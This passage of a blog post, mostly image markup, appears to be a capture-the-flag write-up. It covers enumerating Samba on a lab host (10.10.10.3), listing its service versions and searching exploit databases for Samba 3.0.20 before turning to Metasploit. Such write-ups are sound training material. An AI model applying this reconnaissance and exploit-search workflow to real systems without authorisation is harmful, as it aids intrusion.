href="https://substackcdn.com/image/fetch/$s_!df4O!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F41756789-b734-42fc-8776-9cce6701e046_800x676.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!df4O!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F41756789-b734-42fc-8776-9cce6701e046_800x676.png 424w, https://substackcdn.com/image/fetch/$s_!df4O!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F41756789-b734-42fc-8776-9cce6701e046_800x676.png 848w, https://substackcdn.com/image/fetch/$s_!df4O!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F41756789-b734-42fc-8776-9cce6701e046_800x676.png 1272w, https://substackcdn.com/image/fetch/$s_!df4O!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F41756789-b734-42fc-8776-9cce6701e046_800x676.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!df4O!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F41756789-b734-42fc-8776-9cce6701e046_800x676.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/41756789-b734-42fc-8776-9cce6701e046_800x676.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!df4O!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F41756789-b734-42fc-8776-9cce6701e046_800x676.png 424w, https://substackcdn.com/image/fetch/$s_!df4O!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F41756789-b734-42fc-8776-9cce6701e046_800x676.png 848w, https://substackcdn.com/image/fetch/$s_!df4O!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F41756789-b734-42fc-8776-9cce6701e046_800x676.png 1272w, https://substackcdn.com/image/fetch/$s_!df4O!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F41756789-b734-42fc-8776-9cce6701e046_800x676.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!N78o!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5ae763-41fc-4c68-bb2c-d21398f91ef9_800x669.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!N78o!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5ae763-41fc-4c68-bb2c-d21398f91ef9_800x669.png 424w, https://substackcdn.com/image/fetch/$s_!N78o!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5ae763-41fc-4c68-bb2c-d21398f91ef9_800x669.png 848w, https://substackcdn.com/image/fetch/$s_!N78o!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5ae763-41fc-4c68-bb2c-d21398f91ef9_800x669.png 1272w, https://substackcdn.com/image/fetch/$s_!N78o!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5ae763-41fc-4c68-bb2c-d21398f91ef9_800x669.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!N78o!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5ae763-41fc-4c68-bb2c-d21398f91ef9_800x669.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/da5ae763-41fc-4c68-bb2c-d21398f91ef9_800x669.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!N78o!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5ae763-41fc-4c68-bb2c-d21398f91ef9_800x669.png 424w, https://substackcdn.com/image/fetch/$s_!N78o!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5ae763-41fc-4c68-bb2c-d21398f91ef9_800x669.png 848w, https://substackcdn.com/image/fetch/$s_!N78o!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5ae763-41fc-4c68-bb2c-d21398f91ef9_800x669.png 1272w, https://substackcdn.com/image/fetch/$s_!N78o!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fda5ae763-41fc-4c68-bb2c-d21398f91ef9_800x669.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Boo, hiss, none of them work. Let&#8217;s see if we can get anything else from enum4linux.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!nTQG!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6352c5c8-b208-4b60-a94b-ac7430523dde_800x190.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!nTQG!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6352c5c8-b208-4b60-a94b-ac7430523dde_800x190.png 424w, https://substackcdn.com/image/fetch/$s_!nTQG!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6352c5c8-b208-4b60-a94b-ac7430523dde_800x190.png 848w, https://substackcdn.com/image/fetch/$s_!nTQG!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6352c5c8-b208-4b60-a94b-ac7430523dde_800x190.png 1272w, https://substackcdn.com/image/fetch/$s_!nTQG!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6352c5c8-b208-4b60-a94b-ac7430523dde_800x190.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!nTQG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6352c5c8-b208-4b60-a94b-ac7430523dde_800x190.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/6352c5c8-b208-4b60-a94b-ac7430523dde_800x190.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!nTQG!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6352c5c8-b208-4b60-a94b-ac7430523dde_800x190.png 424w, https://substackcdn.com/image/fetch/$s_!nTQG!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6352c5c8-b208-4b60-a94b-ac7430523dde_800x190.png 848w, https://substackcdn.com/image/fetch/$s_!nTQG!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6352c5c8-b208-4b60-a94b-ac7430523dde_800x190.png 1272w, https://substackcdn.com/image/fetch/$s_!nTQG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6352c5c8-b208-4b60-a94b-ac7430523dde_800x190.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!kLll!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6822011-97bf-4e19-9198-1e346e2adee7_800x616.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!kLll!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6822011-97bf-4e19-9198-1e346e2adee7_800x616.png 424w, https://substackcdn.com/image/fetch/$s_!kLll!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6822011-97bf-4e19-9198-1e346e2adee7_800x616.png 848w, https://substackcdn.com/image/fetch/$s_!kLll!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6822011-97bf-4e19-9198-1e346e2adee7_800x616.png 1272w, https://substackcdn.com/image/fetch/$s_!kLll!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6822011-97bf-4e19-9198-1e346e2adee7_800x616.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!kLll!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6822011-97bf-4e19-9198-1e346e2adee7_800x616.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/d6822011-97bf-4e19-9198-1e346e2adee7_800x616.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!kLll!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6822011-97bf-4e19-9198-1e346e2adee7_800x616.png 424w, https://substackcdn.com/image/fetch/$s_!kLll!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6822011-97bf-4e19-9198-1e346e2adee7_800x616.png 848w, https://substackcdn.com/image/fetch/$s_!kLll!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6822011-97bf-4e19-9198-1e346e2adee7_800x616.png 1272w, https://substackcdn.com/image/fetch/$s_!kLll!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6822011-97bf-4e19-9198-1e346e2adee7_800x616.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Winner, winner, Chicken dinner.</p><p>Let&#8217;s see what we can connect to (namely the<strong> \\10.10.10.3\tmp</strong> share.)</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!gTQb!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7215d1e1-29f2-44b0-9a45-a990dc7082d7_800x697.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!gTQb!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7215d1e1-29f2-44b0-9a45-a990dc7082d7_800x697.png 424w, https://substackcdn.com/image/fetch/$s_!gTQb!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7215d1e1-29f2-44b0-9a45-a990dc7082d7_800x697.png 848w, https://substackcdn.com/image/fetch/$s_!gTQb!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7215d1e1-29f2-44b0-9a45-a990dc7082d7_800x697.png 1272w, https://substackcdn.com/image/fetch/$s_!gTQb!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7215d1e1-29f2-44b0-9a45-a990dc7082d7_800x697.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!gTQb!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7215d1e1-29f2-44b0-9a45-a990dc7082d7_800x697.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/7215d1e1-29f2-44b0-9a45-a990dc7082d7_800x697.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!gTQb!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7215d1e1-29f2-44b0-9a45-a990dc7082d7_800x697.png 424w, https://substackcdn.com/image/fetch/$s_!gTQb!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7215d1e1-29f2-44b0-9a45-a990dc7082d7_800x697.png 848w, https://substackcdn.com/image/fetch/$s_!gTQb!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7215d1e1-29f2-44b0-9a45-a990dc7082d7_800x697.png 1272w, https://substackcdn.com/image/fetch/$s_!gTQb!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7215d1e1-29f2-44b0-9a45-a990dc7082d7_800x697.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Not much luck here. Let&#8217;s check searchSploit for the specific version of Samba via <em>searchsploit samba\ 3.0.20</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!oMnz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0c89ce09-77e0-45d1-99af-1f26a0e37eb5_800x95.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!oMnz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0c89ce09-77e0-45d1-99af-1f26a0e37eb5_800x95.png 424w, https://substackcdn.com/image/fetch/$s_!oMnz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0c89ce09-77e0-45d1-99af-1f26a0e37eb5_800x95.png 848w, https://substackcdn.com/image/fetch/$s_!oMnz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0c89ce09-77e0-45d1-99af-1f26a0e37eb5_800x95.png 1272w, https://substackcdn.com/image/fetch/$s_!oMnz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0c89ce09-77e0-45d1-99af-1f26a0e37eb5_800x95.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!oMnz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0c89ce09-77e0-45d1-99af-1f26a0e37eb5_800x95.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/0c89ce09-77e0-45d1-99af-1f26a0e37eb5_800x95.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!oMnz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0c89ce09-77e0-45d1-99af-1f26a0e37eb5_800x95.png 424w, https://substackcdn.com/image/fetch/$s_!oMnz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0c89ce09-77e0-45d1-99af-1f26a0e37eb5_800x95.png 848w, https://substackcdn.com/image/fetch/$s_!oMnz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0c89ce09-77e0-45d1-99af-1f26a0e37eb5_800x95.png 1272w, https://substackcdn.com/image/fetch/$s_!oMnz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0c89ce09-77e0-45d1-99af-1f26a0e37eb5_800x95.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><h3>Methodology</h3><blockquote><p><em>Updated port scan and enumeration information:</em></p></blockquote><blockquote><p><em>21/tcp: ftp vsftpd 2.3.4<br>22/tcp: ssh OpenSSH 4.7p1 Debian 8ubutunu1 (protocol 2.0)<br>139/tcp: Samba smbd 3.0.20<br>445/tcp: Samba smbd 3.0.20</em></p></blockquote><p>Here are our options.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!JX1J!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f108cc7-e6ec-48b3-a0ae-4e7da0af24d6_800x95.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!JX1J!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f108cc7-e6ec-48b3-a0ae-4e7da0af24d6_800x95.png 424w, https://substackcdn.com/image/fetch/$s_!JX1J!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f108cc7-e6ec-48b3-a0ae-4e7da0af24d6_800x95.png 848w, https://substackcdn.com/image/fetch/$s_!JX1J!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f108cc7-e6ec-48b3-a0ae-4e7da0af24d6_800x95.png 1272w, https://substackcdn.com/image/fetch/$s_!JX1J!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f108cc7-e6ec-48b3-a0ae-4e7da0af24d6_800x95.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!JX1J!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f108cc7-e6ec-48b3-a0ae-4e7da0af24d6_800x95.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/9f108cc7-e6ec-48b3-a0ae-4e7da0af24d6_800x95.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!JX1J!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f108cc7-e6ec-48b3-a0ae-4e7da0af24d6_800x95.png 424w, https://substackcdn.com/image/fetch/$s_!JX1J!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f108cc7-e6ec-48b3-a0ae-4e7da0af24d6_800x95.png 848w, https://substackcdn.com/image/fetch/$s_!JX1J!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f108cc7-e6ec-48b3-a0ae-4e7da0af24d6_800x95.png 1272w, https://substackcdn.com/image/fetch/$s_!JX1J!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f108cc7-e6ec-48b3-a0ae-4e7da0af24d6_800x95.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>It doesn&#8217;t look like we have many options. It&#8217;s late, let&#8217;s use Metasploit.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" 